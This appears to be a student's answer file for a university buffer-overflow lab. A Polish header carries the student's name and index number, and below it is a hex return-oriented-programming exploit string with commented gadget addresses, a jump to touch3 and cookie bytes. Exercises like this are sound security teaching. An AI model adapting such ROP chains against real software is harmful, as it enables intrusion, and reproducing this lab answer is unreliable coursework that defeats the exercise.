/* 
 * Oświadczam, że zapoznałem(-am) się z regulaminem prowadzenia zajęć
 * i jestem świadomy(-a) konsekwencji niestosowania się do podanych tam zasad.
 *
 * Imię i nazwisko, numer indeksu: Piotr Stachowicz, 337942
 *
 * Poniżej należy podać i wyjaśnić zawartość wkładaną na stos programu.
 */

42 42 42 42 42 42 42 42 /* nic */
42 42 42 42 42 42 42 42 /* nic */
42 42 42 42 42 42 42 42 /* nic */
96 1e 40 00 00 00 00 00 /* Gadget: movq %rsp, %rax */ 
33 1e 40 00 00 00 00 00 /* Gadget: movq %rax, %rdi */
55 1e 40 00 00 00 00 00 /* Gadget: popq %eax */
48 00 00 00 00 00 00 00 /* Ta wartosc zostanie w linijce 15 dana do %rax */
8f 1e 40 00 00 00 00 00 /* Gadget: movl %eax, %ecx */
f3 1e 40 00 00 00 00 00 /* Gadget: movl %ecx, %edx */
bf 1e 40 00 00 00 00 00 /* Gadget: movl %edx, %esi */
6d 1e 40 00 00 00 00 00 /* Gadget: lea(%rdi, %rsi, 1), %rax    (teraz %rax wskazuje znaki w stosie) */
33 1e 40 00 00 00 00 00 /* Gadget: movq %rax, %rdi */
9e 1d 40 00 00 00 00 00 /* Adres Touch3 */
32 38 33 36 34 33 32 30 /* Znaki Cookie */
00 00 00 00 00 00 00 00 /* znak konca slowa */
